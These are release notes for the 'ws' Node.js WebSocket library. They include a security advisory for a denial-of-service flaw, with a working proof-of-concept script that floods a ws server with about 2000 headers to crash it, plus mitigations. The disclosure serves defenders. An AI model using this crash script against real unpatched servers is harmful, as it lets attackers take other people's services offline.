Bug fixes

Fixed an issue that, during message decompression when the maximum size was
exceeded, led to the emission of an inaccurate error and closure of the
connection with an improper close code (#2285).

Bug fixes

• The length of the UNIX domain socket paths in the tests has been shortened to
  make them work when run via CITGM (021f7b8b).

Features

• Added support for Blob (#2229).

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding theserver.maxHeadersCount
threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the
   --max-http-header-size=size and/or the maxHeaderSize options so
   that no more headers than the server.maxHeadersCount limit can be sent.
2. Set server.maxHeadersCount to 0 so that no limit is applied.

Bug fixes

• Backported e55e5106 to the 6.x release line (eeb76d31).

Bug fixes

• Backported e55e5106 to the 7.x release line (22c28763).

Bug fixes

• Backported e55e5106 to the 5.x release line (4abd8f6d).

Features

• The WebSocket constructor now accepts the createConnection option (#2219).

Other notable changes

• The default value of the allowSynchronousEvents option has been changed to
  true (#2221).

This is a breaking change in a patch release. The assumption is that the option
is not widely used.

Features

• Added the autoPong option (01ba54ed).

Notable changes

• The allowMultipleEventsPerMicrotask option has been renamed to
  allowSynchronousEvents (4ed7fe58).

This is a breaking change in a patch release that could have been avoided with
an alias, but the renamed option was added only 3 days ago, so hopefully it
hasn’t already been widely used.